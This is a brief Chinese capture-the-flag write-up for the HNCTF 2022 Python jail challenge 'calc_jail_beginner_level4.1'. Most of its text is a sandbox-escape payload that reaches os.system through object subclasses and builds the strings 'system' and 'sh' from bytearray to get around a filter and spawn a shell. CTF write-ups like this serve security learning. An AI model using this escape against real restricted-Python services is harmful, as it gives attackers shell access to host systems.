【misc】[HNCTF 2022 WEEK2]calc_jail_beginner_level4.1(JAIL) --沙盒逃逸,python模板注入变换

这道题没给附件,直接连上看看

这里一开始用().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decode())进行尝试,后面发现bytes函数被禁用了,可以用另外的函数代替().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytearray([115,121,115,116,101,109]).decode()](bytearray([115,104]).decode())

 

posted @ 2023-12-20 23:04  GGBomb  阅读(18)  评论(0编辑  收藏  举报